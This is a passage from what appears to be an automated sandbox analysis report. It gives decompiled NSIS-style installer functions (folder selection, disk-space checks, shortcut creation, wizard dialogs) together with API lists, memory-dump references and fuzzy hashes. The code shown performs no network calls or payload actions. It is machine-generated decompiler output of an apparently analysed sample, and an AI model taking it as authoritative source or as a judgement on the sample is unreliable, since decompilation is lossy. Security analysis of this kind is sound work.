				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































                                            0x004041eb
                                            0x004041f2
                                            0x004041fe
                                            0x0040420c
                                            0x00404214
                                            0x00404218
                                            0x0040421e
                                            0x0040421e
                                            0x0040422a
                                            0x004042a4
                                            0x004042ab
                                            0x00404377
                                            0x0040437e
                                            0x0040438d
                                            0x0040438d
                                            0x00404391
                                            0x00404397
                                            0x0040439a
                                            0x004043a7
                                            0x004043a9
                                            0x004043a9
                                            0x004043b7
                                            0x004043bd
                                            0x004043c4
                                            0x004043c6
                                            0x004043c6
                                            0x004043d3
                                            0x004043df
                                            0x00404403
                                            0x00404414
                                            0x0040441a
                                            0x0040441c
                                            0x00000000
                                            0x00000000
                                            0x00404422
                                            0x00404422
                                            0x00404430
                                            0x00000000
                                            0x004043e1
                                            0x004043e4
                                            0x004043e8
                                            0x004043ec
                                            0x004043ed
                                            0x004043f2
                                            0x00000000
                                            0x00000000
                                            0x004043fa
                                            0x00404432
                                            0x00404432
                                            0x00404439
                                            0x00404442
                                            0x00404444
                                            0x00404444
                                            0x00404456
                                            0x00404460
                                            0x00404468
                                            0x0040447e
                                            0x0040446a
                                            0x0040446e
                                            0x0040446e
                                            0x00404468
                                            0x00404483
                                            0x00404488
                                            0x0040448d
                                            0x00404496
                                            0x00404496
                                            0x0040449f
                                            0x004044a1
                                            0x004044a1
                                            0x004044ad
                                            0x004044b5
                                            0x004044bf
                                            0x004044bf
                                            0x004044c4
                                            0x00000000
                                            0x004044c4
                                            0x004043df
                                            0x00404380
                                            0x00404387
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404387
                                            0x004042b1
                                            0x004042b7
                                            0x004042d1
                                            0x004042d6
                                            0x004042e0
                                            0x004042e7
                                            0x004042ec
                                            0x004042f6
                                            0x004042f9
                                            0x004042fc
                                            0x00404303
                                            0x0040430b
                                            0x0040430e
                                            0x00404312
                                            0x00404319
                                            0x00404321
                                            0x00404370
                                            0x00404323
                                            0x00404324
                                            0x0040432a
                                            0x00404334
                                            0x0040433c
                                            0x0040433e
                                            0x0040433f
                                            0x00404341
                                            0x00404347
                                            0x00404355
                                            0x00404359
                                            0x00404359
                                            0x00404355
                                            0x0040435e
                                            0x00404369
                                            0x00404369
                                            0x00404321
                                            0x00000000
                                            0x004042d6
                                            0x004042c4
                                            0x00000000
                                            0x00000000
                                            0x004042ca
                                            0x00000000
                                            0x0040422c
                                            0x00404237
                                            0x00404240
                                            0x0040424d
                                            0x0040424d
                                            0x00404257
                                            0x0040425c
                                            0x00404265
                                            0x00404268
                                            0x0040426d
                                            0x00404275
                                            0x00404278
                                            0x0040427d
                                            0x00404283
                                            0x00404292
                                            0x00404299
                                            0x004044ca
                                            0x004044dc
                                            0x004044dc
                                            0x004042a2
                                            0x00000000
                                            0x004042a2

                                            APIs
                                            • GetDlgItem.USER32 ref: 00404230
                                            • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                            • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                            • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                            • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                            • SetDlgItemTextA.USER32 ref: 00404369
                                              • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                            • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                            • SetDlgItemTextA.USER32 ref: 0040447E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                            • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                            • API String ID: 2007447535-1909522251
                                            • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                            • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                            • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                            • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                            0x004020af
                                            0x004020b9
                                            0x004020c2
                                            0x004020cc
                                            0x004020d5
                                            0x004020df
                                            0x004020e3
                                            0x004020e3
                                            0x004020e8
                                            0x004020f9
                                            0x00402101
                                            0x004021df
                                            0x004021df
                                            0x004021e6
                                            0x00402107
                                            0x00402107
                                            0x00402118
                                            0x0040211c
                                            0x00402122
                                            0x0040212c
                                            0x0040212e
                                            0x00402139
                                            0x0040213c
                                            0x00402149
                                            0x0040214b
                                            0x0040214d
                                            0x00402154
                                            0x00402157
                                            0x00402157
                                            0x0040215a
                                            0x00402164
                                            0x0040216c
                                            0x00402171
                                            0x0040217d
                                            0x0040217d
                                            0x00402180
                                            0x00402189
                                            0x0040218c
                                            0x00402195
                                            0x0040219a
                                            0x004021ac
                                            0x004021b5
                                            0x004021bb
                                            0x004021c7
                                            0x004021c7
                                            0x004021c9
                                            0x004021cf
                                            0x004021cf
                                            0x004021d2
                                            0x004021d8
                                            0x004021dd
                                            0x004021f2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004021dd
                                            0x004021e8
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharCreateInstanceMultiWide
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 123533781-1943935188
                                            • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                            • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
                                            • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
                                            • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004026BC, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 39%
                                            			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
					E0040591D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E004059BF();
				} else {
					 *((char*)(__edi)) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                            0x004026d4
                                            0x004026e8
                                            0x004026f3
                                            0x004026f4
                                            0x00402855
                                            0x004026d6
                                            0x004026d6
                                            0x004026d8
                                            0x004026da
                                            0x004026da
                                            0x00402932
                                            0x0040293e

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239829820.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.239825580.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239837078.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239842903.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239870650.000000000077A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239877497.0000000000784000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239882463.0000000000788000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239902318.0000000000795000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239912607.00000000007A1000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239917580.00000000007A9000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.239922703.00000000007AC000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                            • Instruction ID: fa0b3d5524a7ec5f3b356c4eb27d29c110ff1bfb4a1b37a6377ddf9626cce4e3
                                            • Opcode Fuzzy Hash: 9223db83c99603c3289ccd37b6b2a6db7d53f2a3e2294c42d49ba21f7ea334b2
                                            • Instruction Fuzzy Hash: EBF0A0B2608110DBE701EBA49E49AEEB768DF52324F60417BE141B20C1D6B84A44DA2A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 02551875, Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240226269.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                            • Instruction ID: d195ba1e032d2d00cfcd7f094540a8c78d71148f7620a2585cfdea09a17d4037
                                            • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                            • Instruction Fuzzy Hash: C1014C78E11618EFCB51DF98C580A9DBBF5FB08220F1185A6EC19E7711D334AE509B44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0255165D, Relevance: .0, Instructions: 10COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.240226269.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004038BF, Relevance: 46.8, APIs: 31, Instructions: 347windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t35;
				struct HWND__* _t37;
				struct HWND__* _t47;
				struct HWND__* _t65;
				struct HWND__* _t71;
				struct HWND__* _t84;
				struct HWND__* _t89;
				struct HWND__* _t97;
				int _t101;
				int _t104;
				struct HWND__* _t117;
				struct HWND__* _t120;
				signed int _t122;
				struct HWND__* _t127;
				long _t132;
				int _t134;
				int _t135;
				struct HWND__* _t136;
				void* _t139;

				_t135 = _a8;
				if(_t135 == 0x110 || _t135 == 0x408) {
					_t33 = _a12;
					_t117 = _a4;
					__eflags = _t135 - 0x110;
					 *0x79f56c = _t33;
					if(_t135 == 0x110) {
						 *0x7a2f84 = _t117;
						 *0x79f57c = GetDlgItem(_t117, 1);
						_t89 = GetDlgItem(_t117, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79e548 = _t89;
						E00403DA7(_t117);
						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
						 *0x7a274c = E00401410(4);
						_t33 = 1;
						__eflags = 1;
						 *0x79f56c = 1;
					}
					_t120 =  *0x409284; // 0xffffffff
					_t132 = (_t120 << 6) +  *0x7a2fa0;
					__eflags = _t120;
					if(_t120 < 0) {
						L38:
						E00403DF3(0x40b);
						while(1) {
							_t35 =  *0x79f56c;
							 *0x409284 =  *0x409284 + _t35;
							_t132 = _t132 + (_t35 << 6);
							_t37 =  *0x409284; // 0xffffffff
							__eflags = _t37 -  *0x7a2fa4;
							if(_t37 ==  *0x7a2fa4) {
								E00401410(1);
							}
							__eflags =  *0x7a274c;
							if( *0x7a274c != 0) {
								break;
							}
							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_push( *((intOrPtr*)(_t132 + 0x24)));
							_t122 =  *(_t132 + 0x14);
							_push(0x7ab000);
							E004059E1(_t117, _t122, _t132);
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA7(_t117);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E00403DA7(_t117);
							_t47 = GetDlgItem(_t117, 3);
							__eflags =  *0x7a300c;
							_t136 = _t47;
							if( *0x7a300c != 0) {
								_t122 = _t122 & 0x0000fefd | 0x00000004;
								__eflags = _t122;
							}
							ShowWindow(_t136, _t122 & 0x00000008);
							EnableWindow(_t136, _t122 & 0x00000100);
							E00403DC9(_t122 & 0x00000002);
							EnableWindow( *0x79e548, _t122 & 0x00000004);
							SendMessageA(_t136, 0xf4, 0, 1);
							__eflags =  *0x7a300c;
							if( *0x7a300c == 0) {
								_push( *0x79f57c);
							} else {
								SendMessageA(_t117, 0x401, 2, 0);
								_push( *0x79e548);
							}
							E00403DDC();
							E004059BF(0x79f580, 0x7a2780);
							_push( *((intOrPtr*)(_t132 + 0x18)));
							_push( &(0x79f580[lstrlenA(0x79f580)]));
							E004059E1(_t117, 0, _t132);
							SetWindowTextA(_t117, 0x79f580);
							_push(0);
							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t65;
								if( *_t132 == _t65) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a2758);
									 *0x79ed58 = _t132;
									__eflags =  *_t132;
									if( *_t132 > 0) {
										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
										__eflags = _t71;
										 *0x7a2758 = _t71;
										if(_t71 != 0) {
											_push( *((intOrPtr*)(_t132 + 0x2c)));
											_push(6);
											E00403DA7(_t71);
											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
											ScreenToClient(_t117, _t139 + 0x10);
											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
											_push(0);
											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
											ShowWindow( *0x7a2758, 8);
											E00403DF3(0x405);
										}
									}
									goto L58;
								}
								__eflags =  *0x7a300c - _t65;
								if( *0x7a300c != _t65) {
									goto L61;
								}
								__eflags =  *0x7a3000 - _t65;
								if( *0x7a3000 != _t65) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a2758);
						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
						__eflags =  *0x7a2f84;
						EndDialog(_t117,  *0x79e950);
						goto L58;
					} else {
						__eflags = _t33 - 1;
						if(_t33 != 1) {
							L37:
							__eflags =  *_t132;
							if( *_t132 == 0) {
								goto L61;
							}
							goto L38;
						}
						_push(0);
						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L37;
						}
						SendMessageA( *0x7a2758, 0x40f, 0, 1);
						__eflags =  *0x7a274c;
						return 0 |  *0x7a274c == 0x00000000;
					}
				} else {
					_t117 = _a4;
					if(_t135 == 0x47) {
						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
					}
					if(_t135 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
					}
					if(_t135 != 0x40d) {
						__eflags = _t135 - 0x11;
						if(_t135 != 0x11) {
							__eflags = _t135 - 0x10;
							if(_t135 != 0x10) {
								L14:
								__eflags = _t135 - 0x111;
								if(_t135 != 0x111) {
									L30:
									return E00403E0E(_t135, _a12, _a16);
								}
								_t134 = _a12 & 0x0000ffff;
								_t127 = GetDlgItem(_t117, _t134);
								__eflags = _t127;
								if(_t127 == 0) {
									L17:
									__eflags = _t134 - 1;
									if(_t134 != 1) {
										__eflags = _t134 - 3;
										if(_t134 != 3) {
											__eflags = _t134 - 2;
											if(_t134 != 2) {
												L29:
												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
												goto L30;
											}
											__eflags =  *0x7a300c;
											if( *0x7a300c == 0) {
												_t97 = E00401410(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L30;
												}
												 *0x79e950 = 1;
												L25:
												_push(0x78);
												L26:
												E00403D80();
												goto L30;
											}
											E00401410(_t134);
											 *0x79e950 = _t134;
											goto L25;
										}
										__eflags =  *0x409284;
										if( *0x409284 <= 0) {
											goto L29;
										}
										_push(0xffffffff);
										goto L26;
									}
									_push(1);
									goto L26;
								}
								SendMessageA(_t127, 0xf3, 0, 0);
								_t101 = IsWindowEnabled(_t127);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L61;
								}
								goto L17;
							}
							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
							if(__eflags != 0) {
								goto L30;
							}
							_t104 = IsWindowEnabled( *0x79e548);
							__eflags = _t104;
							if(_t104 != 0) {
								goto L30;
							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                            0x004038c9
                                            0x004038d1
                                            0x00403a4a
                                            0x00403a4e
                                            0x00403a52
                                            0x00403a54
                                            0x00403a59
                                            0x00403a64
                                            0x00403a6f
                                            0x00403a74
                                            0x00403a76
                                            0x00403a78
                                            0x00403a7b
                                            0x00403a80
                                            0x00403a8e
                                            0x00403a9b
                                            0x00403aa2
